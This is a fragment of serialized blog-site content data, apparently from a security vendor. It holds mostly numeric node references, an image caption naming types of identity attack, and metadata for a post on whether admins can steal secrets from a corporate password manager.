6,"data":256727},[],{},{"nodeType":235,"data":256729,"content":256730},{},[256731],{"nodeType":173,"value":222963,"marks":256732,"data":256733},[],{},{"nodeType":250,"data":256735,"content":256736},{},[256737,256746,256755],{"nodeType":254,"data":256738,"content":256739},{},[256740],{"nodeType":178,"data":256741,"content":256742},{},[256743],{"nodeType":173,"value":222976,"marks":256744,"data":256745},[],{},{"nodeType":254,"data":256747,"content":256748},{},[256749],{"nodeType":178,"data":256750,"content":256751},{},[256752],{"nodeType":173,"value":222986,"marks":256753,"data":256754},[],{},{"nodeType":254,"data":256756,"content":256757},{},[256758],{"nodeType":178,"data":256759,"content":256760},{},[256761],{"nodeType":173,"value":222996,"marks":256762,"data":256763},[],{},{"nodeType":235,"data":256765,"content":256766},{},[256767],{"nodeType":173,"value":222177,"marks":256768,"data":256769},[],{},{"nodeType":178,"data":256771,"content":256772},{},[256773],{"nodeType":173,"value":221726,"marks":256774,"data":256775},[],{},{"nodeType":1653,"data":256777,"content":256778},{},[256779,256818],{"nodeType":1657,"data":256780,"content":256781},{},[256782,256791,256800,256809],{"nodeType":1661,"data":256783,"content":256784},{},[256785],{"nodeType":178,"data":256786,"content":256787},{},[256788],{"nodeType":173,"value":221742,"marks":256789,"data":256790},[],{},{"nodeType":1661,"data":256792,"content":256793},{},[256794],{"nodeType":178,"data":256795,"content":256796},{},[256797],{"nodeType":173,"value":222208,"marks":256798,"data":256799},[],{},{"nodeType":1661,"data":256801,"content":256802},{},[256803],{"nodeType":178,"data":256804,"content":256805},{},[256806],{"nodeType":173,"value":221762,"marks":256807,"data":256808},[],{},{"nodeType":1661,"data":256810,"content":256811},{},[256812],{"nodeType":178,"data":256813,"content":256814},{},[256815],{"nodeType":173,"value":221772,"marks":256816,"data":256817},[],{},{"nodeType":1657,"data":256819,"content":256820},{},[256821,256840,256859,256868],{"nodeType":1687,"data":256822,"content":256823},{},[256824],{"nodeType":178,"data":256825,"content":256826},{},[256827,256830,256837],{"nodeType":173,"value":37,"marks":256828,"data":256829},[],{},{"nodeType":186,"data":256831,"content":256832},{"uri":989},[256833],{"nodeType":173,"value":223069,"marks":256834,"data":256836},[256835],{"type":194},{},{"nodeType":173,"value":37,"marks":256838,"data":256839},[],{},{"nodeType":1687,"data":256841,"content":256842},{},[256843],{"nodeType":178,"data":256844,"content":256845},{},[256846,256849,256856],{"nodeType":173,"value":37,"marks":256847,"data":256848},[],{},{"nodeType":186,"data":256850,"content":256851},{"uri":989},[256852],{"nodeType":173,"value":223089,"marks":256853,"data":256855},[256854],{"type":194},{},{"nodeType":173,"value":37,"marks":256857,"data":256858},[],{},{"nodeType":1687,"data":256860,"content":256861},{},[256862],{"nodeType":178,"data":256863,"content":256864},{},[256865],{"nodeType":173,"value":223103,"marks":256866,"data":256867},[],{},{"nodeType":1687,"data":256869,"content":256870},{},[256871],{"nodeType":178,"data":256872,"content":256873},{},[256874],{"nodeType":173,"value":223113,"marks":256875,"data":256876},[],{},{"nodeType":231,"data":256878,"content":256879},{},[],{"nodeType":169,"data":256881,"content":256882},{},[256883],{"nodeType":173,"value":223123,"marks":256884,"data":256885},[],{},{"nodeType":178,"data":256887,"content":256888},{},[256889],{"nodeType":173,"value":223130,"marks":256890,"data":256891},[],{},{"nodeType":235,"data":256893,"content":256894},{},[256895],{"nodeType":173,"value":223137,"marks":256896,"data":256897},[],{},{"nodeType":250,"data":256899,"content":256900},{},[256901,256910,256919,256928,256937,256946],{"nodeType":254,"data":256902,"content":256903},{},[256904],{"nodeType":178,"data":256905,"content":256906},{},[256907],{"nodeType":173,"value":223150,"marks":256908,"data":256909},[],{},{"nodeType":254,"data":256911,"content":256912},{},[256913],{"nodeType":178,"data":256914,"content":256915},{},[256916],{"nodeType":173,"value":223160,"marks":256917,"data":256918},[],{},{"nodeType":254,"data":256920,"content":256921},{},[256922],{"nodeType":178,"data":256923,"content":256924},{},[256925],{"nodeType":173,"value":223170,"marks":256926,"data":256927},[],{},{"nodeType":254,"data":256929,"content":256930},{},[256931],{"nodeType":178,"data":256932,"content":256933},{},[256934],{"nodeType":173,"value":223180,"marks":256935,"data":256936},[],{},{"nodeType":254,"data":256938,"content":256939},{},[256940],{"nodeType":178,"data":256941,"content":256942},{},[256943],{"nodeType":173,"value":223190,"marks":256944,"data":256945},[],{},{"nodeType":254,"data":256947,"content":256948},{},[256949],{"nodeType":178,"data":256950,"content":256951},{},[256952],{"nodeType":173,"value":223200,"marks":256953,"data":256954},[],{},{"nodeType":235,"data":256956,"content":256957},{},[256958],{"nodeType":173,"value":223207,"marks":256959,"data":256960},[],{},{"nodeType":250,"data":256962,"content":256963},{},[256964,256973,256982],{"nodeType":254,"data":256965,"content":256966},{},[256967],{"nodeType":178,"data":256968,"content":256969},{},[256970],{"nodeType":173,"value":223220,"marks":256971,"data":256972},[],{},{"nodeType":254,"data":256974,"content":256975},{},[256976],{"nodeType":178,"data":256977,"content":256978},{},[256979],{"nodeType":173,"value":223230,"marks":256980,"data":256981},[],{},{"nodeType":254,"data":256983,"content":256984},{},[256985],{"nodeType":178,"data":256986,"content":256987},{},[256988],{"nodeType":173,"value":223240,"marks":256989,"data":256990},[],{},{"nodeType":235,"data":256992,"content":256993},{},[256994],{"nodeType":173,"value":223247,"marks":256995,"data":256996},[],{},{"nodeType":250,"data":256998,"content":256999},{},[257000,257009,257018],{"nodeType":254,"data":257001,"content":257002},{},[257003],{"nodeType":178,"data":257004,"content":257005},{},[257006],{"nodeType":173,"value":223260,"marks":257007,"data":257008},[],{},{"nodeType":254,"data":257010,"content":257011},{},[257012],{"nodeType":178,"data":257013,"content":257014},{},[257015],{"nodeType":173,"value":223270,"marks":257016,"data":257017},[],{},{"nodeType":254,"data":257019,"content":257020},{},[257021],{"nodeType":178,"data":257022,"content":257023},{},[257024],{"nodeType":173,"value":223280,"marks":257025,"data":257026},[],{},{"nodeType":235,"data":257028,"content":257029},{},[257030],{"nodeType":173,"value":222177,"marks":257031,"data":257032},[],{},{"nodeType":178,"data":257034,"content":257035},{},[257036],{"nodeType":173,"value":221726,"marks":257037,"data":257038},[],{},{"nodeType":1653,"data":257040,"content":257041},{},[257042,257081,257142],{"nodeType":1657,"data":257043,"content":257044},{},[257045,257054,257063,257072],{"nodeType":1661,"data":257046,"content":257047},{},[257048],{"nodeType":178,"data":257049,"content":257050},{},[257051],{"nodeType":173,"value":221742,"marks":257052,"data":257053},[],{},{"nodeType":1661,"data":257055,"content":257056},{},[257057],{"nodeType":178,"data":257058,"content":257059},{},[257060],{"nodeType":173,"value":222208,"marks":257061,"data":257062},[],{},{"nodeType":1661,"data":257064,"content":257065},{},[257066],{"nodeType":178,"data":257067,"content":257068},{},[257069],{"nodeType":173,"value":221762,"marks":257070,"data":257071},[],{},{"nodeType":1661,"data":257073,"content":257074},{},[257075],{"nodeType":178,"data":257076,"content":257077},{},[257078],{"nodeType":173,"value":221772,"marks":257079,"data":257080},[],{},{"nodeType":1657,"data":257082,"content":257083},{},[257084,257104,257124,257133],{"nodeType":1687,"data":257085,"content":257086},{},[257087],{"nodeType":178,"data":257088,"content":257089},{},[257090,257094,257101],{"nodeType":173,"value":37,"marks":257091,"data":257093},[257092],{"type":194},{},{"nodeType":186,"data":257095,"content":257096},{"uri":114964},[257097],{"nodeType":173,"value":223354,"marks":257098,"data":257100},[257099],{"type":194},{},{"nodeType":173,"value":37,"marks":257102,"data":257103},[],{},{"nodeType":1687,"data":257105,"content":257106},{},[257107],{"nodeType":178,"data":257108,"content":257109},{},[257110,257114,257121],{"nodeType":173,"value":37,"marks":257111,"data":257113},[257112],{"type":194},{},{"nodeType":186,"data":257115,"content":257116},{"uri":114964},[257117],{"nodeType":173,"value":223375,"marks":257118,"data":257120},[257119],{"type":194},{},{"nodeType":173,"value":37,"marks":257122,"data":257123},[],{},{"nodeType":1687,"data":257125,"content":257126},{},[257127],{"nodeType":178,"data":257128,"content":257129},{},[257130],{"nodeType":173,"value":222278,"marks":257131,"data":257132},[],{},{"nodeType":1687,"data":257134,"content":257135},{},[257136],{"nodeType":178,"data":257137,"content":257138},{},[257139],{"nodeType":173,"value":223398,"marks":257140,"data":257141},[],{},{"nodeType":1657,"data":257143,"content":257144},{},[257145,257164,257185,257194],{"nodeType":1687,"data":257146,"content":257147},{},[257148],{"nodeType":178,"data":257149,"content":257150},{},[257151,257154,257161],{"nodeType":173,"value":37,"marks":257152,"data":257153},[],{},{"nodeType":186,"data":257155,"content":257156},{"uri":223415},[257157],{"nodeType":173,"value":223418,"marks":257158,"data":257160},[257159],{"type":194},{},{"nodeType":173,"value":37,"marks":257162,"data":257163},[],{},{"nodeType":1687,"data":257165,"content":257166},{},[257167],{"nodeType":178,"data":257168,"content":257169},{},[257170,257174,257181],{"nodeType":173,"value":37,"marks":257171,"data":257173},[257172],{"type":194},{},{"nodeType":186,"data":257175,"content":257176},{"uri":223415},[257177],{"nodeType":173,"value":223439,"marks":257178,"data":257180},[257179],{"type":194},{},{"nodeType":173,"value":37,"marks":257182,"data":257184},[257183],{"type":194},{},{"nodeType":1687,"data":257186,"content":257187},{},[257188],{"nodeType":178,"data":257189,"content":257190},{},[257191],{"nodeType":173,"value":223454,"marks":257192,"data":257193},[],{},{"nodeType":1687,"data":257195,"content":257196},{},[257197],{"nodeType":178,"data":257198,"content":257199},{},[257200],{"nodeType":173,"value":223464,"marks":257201,"data":257202},[],{},{"nodeType":231,"data":257204,"content":257205},{},[],{"nodeType":169,"data":257207,"content":257208},{},[257209],{"nodeType":173,"value":223474,"marks":257210,"data":257211},[],{},{"nodeType":178,"data":257213,"content":257214},{},[257215],{"nodeType":173,"value":223481,"marks":257216,"data":257217},[],{},{"nodeType":235,"data":257219,"content":257220},{},[257221],{"nodeType":173,"value":223488,"marks":257222,"data":257223},[],{},{"nodeType":250,"data":257225,"content":257226},{},[257227,257236,257245,257254,257263,257272,257281],{"nodeType":254,"data":257228,"content":257229},{},[257230],{"nodeType":178,"data":257231,"content":257232},{},[257233],{"nodeType":173,"value":223501,"marks":257234,"data":257235},[],{},{"nodeType":254,"data":257237,"content":257238},{},[257239],{"nodeType":178,"data":257240,"content":257241},{},[257242],{"nodeType":173,"value":223511,"marks":257243,"data":257244},[],{},{"nodeType":254,"data":257246,"content":257247},{},[257248],{"nodeType":178,"data":257249,"content":257250},{},[257251],{"nodeType":173,"value":223521,"marks":257252,"data":257253},[],{},{"nodeType":254,"data":257255,"content":257256},{},[257257],{"nodeType":178,"data":257258,"content":257259},{},[257260],{"nodeType":173,"value":223531,"marks":257261,"data":257262},[],{},{"nodeType":254,"data":257264,"content":257265},{},[257266],{"nodeType":178,"data":257267,"content":257268},{},[257269],{"nodeType":173,"value":223541,"marks":257270,"data":257271},[],{},{"nodeType":254,"data":257273,"content":257274},{},[257275],{"nodeType":178,"data":257276,"content":257277},{},[257278],{"nodeType":173,"value":223551,"marks":257279,"data":257280},[],{},{"nodeType":254,"data":257282,"content":257283},{},[257284],{"nodeType":178,"data":257285,"content":257286},{},[257287],{"nodeType":173,"value":223561,"marks":257288,"data":257289},[],{},{"nodeType":235,"data":257291,"content":257292},{},[257293],{"nodeType":173,"value":223568,"marks":257294,"data":257295},[],{},{"nodeType":250,"data":257297,"content":257298},{},[257299,257308,257317],{"nodeType":254,"data":257300,"content":257301},{},[257302],{"nodeType":178,"data":257303,"content":257304},{},[257305],{"nodeType":173,"value":223581,"marks":257306,"data":257307},[],{},{"nodeType":254,"data":257309,"content":257310},{},[257311],{"nodeType":178,"data":257312,"content":257313},{},[257314],{"nodeType":173,"value":223591,"marks":257315,"data":257316},[],{},{"nodeType":254,"data":257318,"content":257319},{},[257320],{"nodeType":178,"data":257321,"content":257322},{},[257323],{"nodeType":173,"value":223601,"marks":257324,"data":257325},[],{},{"nodeType":235,"data":257327,"content":257328},{},[257329],{"nodeType":173,"value":223608,"marks":257330,"data":257331},[],{},{"nodeType":250,"data":257333,"content":257334},{},[257335,257344,257353],{"nodeType":254,"data":257336,"content":257337},{},[257338],{"nodeType":178,"data":257339,"content":257340},{},[257341],{"nodeType":173,"value":223621,"marks":257342,"data":257343},[],{},{"nodeType":254,"data":257345,"content":257346},{},[257347],{"nodeType":178,"data":257348,"content":257349},{},[257350],{"nodeType":173,"value":223631,"marks":257351,"data":257352},[],{},{"nodeType":254,"data":257354,"content":257355},{},[257356],{"nodeType":178,"data":257357,"content":257358},{},[257359],{"nodeType":173,"value":223641,"marks":257360,"data":257361},[],{},{"nodeType":235,"data":257363,"content":257364},{},[257365],{"nodeType":173,"value":222177,"marks":257366,"data":257367},[],{},{"nodeType":178,"data":257369,"content":257370},{},[257371],{"nodeType":173,"value":221726,"marks":257372,"data":257373},[],{},{"nodeType":1653,"data":257375,"content":257376},{},[257377,257416,257475,257534],{"nodeType":1657,"data":257378,"content":257379},{},[257380,257389,257398,257407],{"nodeType":1661,"data":257381,"content":257382},{},[257383],{"nodeType":178,"data":257384,"content":257385},{},[257386],{"nodeType":173,"value":221742,"marks":257387,"data":257388},[],{},{"nodeType":1661,"data":257390,"content":257391},{},[257392],{"nodeType":178,"data":257393,"content":257394},{},[257395],{"nodeType":173,"value":222208,"marks":257396,"data":257397},[],{},{"nodeType":1661,"data":257399,"content":257400},{},[257401],{"nodeType":178,"data":257402,"content":257403},{},[257404],{"nodeType":173,"value":221762,"marks":257405,"data":257406},[],{},{"nodeType":1661,"data":257408,"content":257409},{},[257410],{"nodeType":178,"data":257411,"content":257412},{},[257413],{"nodeType":173,"value":221772,"marks":257414,"data":257415},[],{},{"nodeType":1657,"data":257417,"content":257418},{},[257419,257438,257457,257466],{"nodeType":1687,"data":257420,"content":257421},{},[257422],{"nodeType":178,"data":257423,"content":257424},{},[257425,257428,257435],{"nodeType":173,"value":37,"marks":257426,"data":257427},[],{},{"nodeType":186,"data":257429,"content":257430},{"uri":197917},[257431],{"nodeType":173,"value":222369,"marks":257432,"data":257434},[257433],{"type":194},{},{"nodeType":173,"value":37,"marks":257436,"data":257437},[],{},{"nodeType":1687,"data":257439,"content":257440},{},[257441],{"nodeType":178,"data":257442,"content":257443},{},[257444,257447,257454],{"nodeType":173,"value":37,"marks":257445,"data":257446},[],{},{"nodeType":186,"data":257448,"content":257449},{"uri":197917},[257450],{"nodeType":173,"value":222389,"marks":257451,"data":257453},[257452],{"type":194},{},{"nodeType":173,"value":37,"marks":257455,"data":257456},[],{},{"nodeType":1687,"data":257458,"content":257459},{},[257460],{"nodeType":178,"data":257461,"content":257462},{},[257463],{"nodeType":173,"value":223746,"marks":257464,"data":257465},[],{},{"nodeType":1687,"data":257467,"content":257468},{},[257469],{"nodeType":178,"data":257470,"content":257471},{},[257472],{"nodeType":173,"value":222413,"marks":257473,"data":257474},[],{},{"nodeType":1657,"data":257476,"content":257477},{},[257478,257497,257516,257525],{"nodeType":1687,"data":257479,"content":257480},{},[257481],{"nodeType":178,"data":257482,"content":257483},{},[257484,257487,257494],{"nodeType":173,"value":37,"marks":257485,"data":257486},[],{},{"nodeType":186,"data":257488,"content":257489},{"uri":59347},[257490],{"nodeType":173,"value":223774,"marks":257491,"data":257493},[257492],{"type":194},{},{"nodeType":173,"value":37,"marks":257495,"data":257496},[],{},{"nodeType":1687,"data":257498,"content":257499},{},[257500],{"nodeType":178,"data":257501,"content":257502},{},[257503,257506,257513],{"nodeType":173,"value":37,"marks":257504,"data":257505},[],{},{"nodeType":186,"data":257507,"content":257508},{"uri":59347},[257509],{"nodeType":173,"value":59350,"marks":257510,"data":257512},[257511],{"type":194},{},{"nodeType":173,"value":37,"marks":257514,"data":257515},[],{},{"nodeType":1687,"data":257517,"content":257518},{},[257519],{"nodeType":178,"data":257520,"content":257521},{},[257522],{"nodeType":173,"value":223807,"marks":257523,"data":257524},[],{},{"nodeType":1687,"data":257526,"content":257527},{},[257528],{"nodeType":178,"data":257529,"content":257530},{},[257531],{"nodeType":173,"value":223817,"marks":257532,"data":257533},[],{},{"nodeType":1657,"data":257535,"content":257536},{},[257537,257556,257575,257584],{"nodeType":1687,"data":257538,"content":257539},{},[257540],{"nodeType":178,"data":257541,"content":257542},{},[257543,257546,257553],{"nodeType":173,"value":37,"marks":257544,"data":257545},[],{},{"nodeType":186,"data":257547,"content":257548},{"uri":223834},[257549],{"nodeType":173,"value":223837,"marks":257550,"data":257552},[257551],{"type":194},{},{"nodeType":173,"value":37,"marks":257554,"data":257555},[],{},{"nodeType":1687,"data":257557,"content":257558},{},[257559],{"nodeType":178,"data":257560,"content":257561},{},[257562,257565,257572],{"nodeType":173,"value":37,"marks":257563,"data":257564},[],{},{"nodeType":186,"data":257566,"content":257567},{"uri":223834},[257568],{"nodeType":173,"value":223857,"marks":257569,"data":257571},[257570],{"type":194},{},{"nodeType":173,"value":37,"marks":257573,"data":257574},[],{},{"nodeType":1687,"data":257576,"content":257577},{},[257578],{"nodeType":178,"data":257579,"content":257580},{},[257581],{"nodeType":173,"value":223871,"marks":257582,"data":257583},[],{},{"nodeType":1687,"data":257585,"content":257586},{},[257587],{"nodeType":178,"data":257588,"content":257589},{},[257590],{"nodeType":173,"value":223881,"marks":257591,"data":257592},[],{},{"nodeType":231,"data":257594,"content":257595},{},[],{"nodeType":169,"data":257597,"content":257598},{},[257599],{"nodeType":173,"value":223891,"marks":257600,"data":257601},[],{},{"nodeType":235,"data":257603,"content":257604},{},[257605],{"nodeType":173,"value":223898,"marks":257606,"data":257607},[],{},{"nodeType":178,"data":257609,"content":257610},{},[257611],{"nodeType":173,"value":223905,"marks":257612,"data":257613},[],{},{"nodeType":178,"data":257615,"content":257616},{},[257617],{"nodeType":173,"value":223912,"marks":257618,"data":257619},[],{},{"nodeType":231,"data":257621,"content":257622},{},[],{"nodeType":235,"data":257624,"content":257625},{},[257626],{"nodeType":173,"value":223922,"marks":257627,"data":257628},[],{},{"nodeType":178,"data":257630,"content":257631},{},[257632],{"nodeType":173,"value":223929,"marks":257633,"data":257634},[],{},{"nodeType":178,"data":257636,"content":257637},{},[257638],{"nodeType":173,"value":223936,"marks":257639,"data":257640},[],{},{"nodeType":231,"data":257642,"content":257643},{},[],{"nodeType":235,"data":257645,"content":257646},{},[257647],{"nodeType":173,"value":223946,"marks":257648,"data":257649},[],{},{"nodeType":178,"data":257651,"content":257652},{},[257653],{"nodeType":173,"value":223953,"marks":257654,"data":257655},[],{},{"nodeType":178,"data":257657,"content":257658},{},[257659],{"nodeType":173,"value":223960,"marks":257660,"data":257661},[],{},{"nodeType":178,"data":257663,"content":257664},{},[257665],{"nodeType":173,"value":223967,"marks":257666,"data":257667},[],{},{"entries":257669},{"hyperlink":257670,"inline":257671,"block":257672},[],[],[257673],{"sys":257674,"__typename":5345,"title":257675,"caption":257676,"layoutMode":118,"file":257677},{"id":221098},"Table of identity attacks - IDSA 2023. Includes phishing, social engineering, brute forcing, password spraying, credential stuffing, stolen credentials, third party attack, adversary in the middle AITM, insider attack","Breakdown of identity attacks from a 2023 IDSA whitepaper",{"url":257678,"width":257679,"height":226775},"https://images.ctfassets.net/y1cdw1ablpvd/2Pu4DMeLHGxRVEiqLUPtuB/f7841fe0868c7c541dd10b7ab8361d31/Image_19-03-2024_at_15.55.jpeg",2190,"content:blog:identity-attacks-in-the-wild.json","blog/identity-attacks-in-the-wild.json","blog/identity-attacks-in-the-wild",{"_path":257684,"_dir":1500,"_draft":6,"_partial":6,"_locale":37,"sys":257685,"summary":257688,"title":257699,"subtitle":118,"metaTitle":257699,"synopsis":257700,"hashTags":118,"publishedDate":257701,"slug":257702,"ogImage":257703,"tagsCollection":257705,"relatedBlogPostsCollection":257711,"authorsCollection":259916,"content":259920,"_id":260479,"_type":5439,"_source":5440,"_file":260480,"_stem":260481,"_extension":5439},"/blog/can-my-admins-steal-my-cloud-password-manager-secrets",{"id":257686,"publishedAt":257687},"67rmNM2GcROwaonN9vzAW8","2024-03-21T11:48:25.035Z",{"json":257689},{"data":257690,"content":257691,"nodeType":165},{},[257692],{"data":257693,"content":257694,"nodeType":178},{},[257695],{"data":257696,"marks":257697,"value":257698,"nodeType":173},{},[],"We all know admin accounts are powerful and need to be protected - a compromised admin account can do a lot of damage, after all. But can a compromised admin account steal the secrets from your corporate password manager? If so, how does this affect your ability to respond to a hijacked account or malicious insider? Let's dive in.","Can my admins steal my cloud password manager secrets?","Can admins access the secrets from your corporate password manager? If so, how does this affect incident response in a compromised admin account scenario?","2024-03-11T00:00:00.000Z","can-my-admins-steal-my-cloud-password-manager-secrets",{"url":257704},"https://images.ctfassets.net/y1cdw1ablpvd/3PtOPCztNCvolfamtRFInx/954afbab640ca1b6caeed9dc77e6c76c/Heading.jpg",{"items":257706},[257707,257709],{"sys":257708,"name":509},{"id":508},{"sys":257710,"name":26137},{"id":26136},{"items":257712},[257713,258260,259450],{"__typename":1528,"sys":257714,"content":257715,"title":162246,"synopsis":228508,"hashTags":118,"publishedDate":228509,"slug":228510,"tagsCollection":258250,"authorsCollection":258256},{"id":227899},{"json":257716},{"data":257717,"content":257718,"nodeType":165},{},[257719,257735,257741,257747,257763,257769,257784,257790,257796,257822,257828,257834,257840,257846,257875,257880,257886,257902,257908,257914,257920,257950,257956,257962,257968,257984,257989,257994,257999,258005,258023,258029,258035,258041,258047,258104,258110,258149,258155,258160,258166,258179,258184,258190,258196,258226,258232,258238,258244],{"data":257720,"content":257721,"nodeType":178},{},[257722,257725,257732],{"data":257723,"marks":257724,"value":227910,"nodeType":173},{},[],{"data":257726,"content":257727,"nodeType":186},{"uri":70029},[257728],{"data":257729,"marks":257730,"value":227918,"nodeType":173},{},[257731],{"type":194},{"data":257733,"marks":257734,"value":227922,"nodeType":173},{},[],{"data":257736,"content":257737,"nodeType":178},{},[257738],{"data":257739,"marks":257740,"value":227929,"nodeType":173},{},[],{"data":257742,"content":257743,"nodeType":169},{},[257744],{"data":257745,"marks":257746,"value":227936,"nodeType":173},{},[],{"data":257748,"content":257749,"nodeType":178},{},[257750,257753,257760],{"data":257751,"marks":257752,"value":37,"nodeType":173},{},[],{"data":257754,"content":257755,"nodeType":186},{"uri":63250},[257756],{"data":257757,"marks":257758,"value":63256,"nodeType":173},{},[257759],{"type":194},{"data":257761,"marks":257762,"value":227953,"nodeType":173},{},[],{"data":257764,"content":257765,"nodeType":169},{},[257766],{"data":257767,"marks":257768,"value":227960,"nodeType":173},{},[],{"data":257770,"content":257771,"nodeType":178},{},[257772,257775,257781],{"data":257773,"marks":257774,"value":37,"nodeType":173},{},[],{"data":257776,"content":257777,"nodeType":186},{"uri":208521},[257778],{"data":257779,"marks":257780,"value":227973,"nodeType":173},{},[],{"data":257782,"marks":257783,"value":227977,"nodeType":173},{},[],{"data":257785,"content":257786,"nodeType":169},{},[257787],{"data":257788,"marks":257789,"value":227984,"nodeType":173},{},[],{"data":257791,"content":257792,"nodeType":178},{},[257793],{"data":257794,"marks":257795,"value":227991,"nodeType":173},{},[],{"data":257797,"content":257798,"nodeType":178},{},[257799,257802,257809,257812,257819],{"data":257800,"marks":257801,"value":227998,"nodeType":173},{},[],{"data":257803,"content":257804,"nodeType":186},{"uri":228001},[257805],{"data":257806,"marks":257807,"value":228007,"nodeType":173},{},[257808],{"type":194},{"data":257810,"marks":257811,"value":228011,"nodeType":173},{},[],{"data":257813,"content":257814,"nodeType":186},{"uri":228014},[257815],{"data":257816,"marks":257817,"value":228020,"nodeType":173},{},[257818],{"type":194},{"data":257820,"marks":257821,"value":228024,"nodeType":173},{},[],{"data":257823,"content":257824,"nodeType":178},{},[257825],{"data":257826,"marks":257827,"value":228031,"nodeType":173},{},[],{"data":257829,"content":257830,"nodeType":178},{},[257831],{"data":257832,"marks":257833,"value":228038,"nodeType":173},{},[],{"data":257835,"content":257836,"nodeType":178},{},[257837],{"data":257838,"marks":257839,"value":228045,"nodeType":173},{},[],{"data":257841,"content":257842,"nodeType":178},{},[257843],{"data":257844,"marks":257845,"value":228052,"nodeType":173},{},[],{"data":257847,"content":257848,"nodeType":250},{},[257849,257862],{"data":257850,"content":257851,"nodeType":254},{},[257852],{"data":257853,"content":257854,"nodeType":178},{},[257855,257859],{"data":257856,"marks":257857,"value":228066,"nodeType":173},{},[257858],{"type":370},{"data":257860,"marks":257861,"value":228070,"nodeType":173},{},[],{"data":257863,"content":257864,"nodeType":254},{},[257865],{"data":257866,"content":257867,"nodeType":178},{},[257868,257872],{"data":257869,"marks":257870,"value":228081,"nodeType":173},{},[257871],{"type":370},{"data":257873,"marks":257874,"value":228085,"nodeType":173},{},[],{"data":257876,"content":257879,"nodeType":312},{"target":257877},{"sys":257878},{"id":169040,"type":317,"linkType":318},[],{"data":257881,"content":257882,"nodeType":169},{},[257883],{"data":257884,"marks":257885,"value":228066,"nodeType":173},{},[],{"data":257887,"content":257888,"nodeType":178},{},[257889,257892,257899],{"data":257890,"marks":257891,"value":228103,"nodeType":173},{},[],{"data":257893,"content":257894,"nodeType":186},{"uri":228106},[257895],{"data":257896,"marks":257897,"value":228112,"nodeType":173},{},[257898],{"type":194},{"data":257900,"marks":257901,"value":37,"nodeType":173},{},[],{"data":257903,"content":257904,"nodeType":178},{},[257905],{"data":257906,"marks":257907,"value":228122,"nodeType":173},{},[],{"data":257909,"content":257910,"nodeType":178},{},[257911],{"data":257912,"marks":257913,"value":228129,"nodeType":173},{},[],{"data":257915,"content":257916,"nodeType":178},{},[257917],{"data":257918,"marks":257919,"value":228136,"nodeType":173},{},[],{"data":257921,"content":257922,"nodeType":250},{},[257923,257932,257941],{"data":257924,"content":257925,"nodeType":254},{},[257926],{"data":257927,"content":257928,"nodeType":178},{},[257929],{"data":257930,"marks":257931,"value":228149,"nodeType":173},{},[],{"data":257933,"content":257934,"nodeType":254},{},[257935],{"data":257936,"content":257937,"nodeType":178},{},[257938],{"data":257939,"marks":257940,"value":228159,"nodeType":173},{},[],{"data":257942,"content":257943,"nodeType":254},{},[257944],{"data":257945,"content":257946,"nodeType":178},{},[257947],{"data":257948,"marks":257949,"value":228169,"nodeType":173},{},[],{"data":257951,"content":257952,"nodeType":178},{},[257953],{"data":257954,"marks":257955,"value":228176,"nodeType":173},{},[],{"data":257957,"content":257958,"nodeType":178},{},[257959],{"data":257960,"marks":257961,"value":228183,"nodeType":173},{},[],{"data":257963,"content":257964,"nodeType":178},{},[257965],{"data":257966,"marks":257967,"value":228190,"nodeType":173},{},[],{"data":257969,"content":257970,"nodeType":178},{},[257971,257974,257981],{"data":257972,"marks":257973,"value":37,"nodeType":173},{},[],{"data":257975,"content":257976,"nodeType":186},{"uri":228199},[257977],{"data":257978,"marks":257979,"value":228199,"nodeType":173},{},[257980],{"type":194},{"data":257982,"marks":257983,"value":37,"nodeType":173},{},[],{"data":257985,"content":257988,"nodeType":312},{"target":257986},{"sys":257987},{"id":228212,"type":317,"linkType":318},[],{"data":257990,"content":257993,"nodeType":312},{"target":257991},{"sys":257992},{"id":228218,"type":317,"linkType":318},[],{"data":257995,"content":257998,"nodeType":312},{"target":257996},{"sys":257997},{"id":228224,"type":317,"linkType":318},[],{"data":258000,"content":258001,"nodeType":169},{},[258002],{"data":258003,"marks":258004,"value":228232,"nodeType":173},{},[],{"data":258006,"content":258007,"nodeType":178},{},[258008,258011,258020],{"data":258009,"marks":258010,"value":228239,"nodeType":173},{},[],{"data":258012,"content":258015,"nodeType":1698},{"target":258013},{"sys":258014},{"id":228244,"type":317,"linkType":318},[258016],{"data":258017,"marks":258018,"value":63256,"nodeType":173},{},[258019],{"type":194},{"data":258021,"marks":258022,"value":228253,"nodeType":173},{},[],{"data":258024,"content":258025,"nodeType":178},{},[258026],{"data":258027,"marks":258028,"value":228260,"nodeType":173},{},[],{"data":258030,"content":258031,"nodeType":178},{},[258032],{"data":258033,"marks":258034,"value":228267,"nodeType":173},{},[],{"data":258036,"content":258037,"nodeType":178},{},[258038],{"data":258039,"marks":258040,"value":228274,"nodeType":173},{},[],{"data":258042,"content":258043,"nodeType":178},{},[258044],{"data":258045,"marks":258046,"value":228281,"nodeType":173},{},[],{"data":258048,"content":258049,"nodeType":250},{},[258050,258059,258068,258077,258086,258095],{"data":258051,"content":258052,"nodeType":254},{},[258053],{"data":258054,"content":258055,"nodeType":178},{},[258056],{"data":258057,"marks":258058,"value":228294,"nodeType":173},{},[],{"data":258060,"content":258061,"nodeType":254},{},[258062],{"data":258063,"content":258064,"nodeType":178},{},[258065],{"data":258066,"marks":258067,"value":228304,"nodeType":173},{},[],{"data":258069,"content":258070,"nodeType":254},{},[258071],{"data":258072,"content":258073,"nodeType":178},{},[258074],{"data":258075,"marks":258076,"value":228314,"nodeType":173},{},[],{"data":258078,"content":258079,"nodeType":254},{},[258080],{"data":258081,"content":258082,"nodeType":178},{},[258083],{"data":258084,"marks":258085,"value":228324,"nodeType":173},{},[],{"data":258087,"content":258088,"nodeType":254},{},[258089],{"data":258090,"content":258091,"nodeType":178},{},[258092],{"data":258093,"marks":258094,"value":228334,"nodeType":173},{},[],{"data":258096,"content":258097,"nodeType":254},{},[258098],{"data":258099,"content":258100,"nodeType":178},{},[258101],{"data":258102,"marks":258103,"value":228344,"nodeType":173},{},[],{"data":258105,"content":258106,"nodeType":178},{},[258107],{"data":258108,"marks":258109,"value":228351,"nodeType":173},{},[],{"data":258111,"content":258112,"nodeType":250},{},[258113,258122,258131,258140],{"data":258114,"content":258115,"nodeType":254},{},[258116],{"data":258117,"content":258118,"nodeType":178},{},[258119],{"data":258120,"marks":258121,"value":228364,"nodeType":173},{},[],{"data":258123,"content":258124,"nodeType":254},{},[258125],{"data":258126,"content":258127,"nodeType":178},{},[258128],{"data":258129,"marks":258130,"value":228374,"nodeType":173},{},[],{"data":258132,"content":258133,"nodeType":254},{},[258134],{"data":258135,"content":258136,"nodeType":178},{},[258137],{"data":258138,"marks":258139,"value":228384,"nodeType":173},{}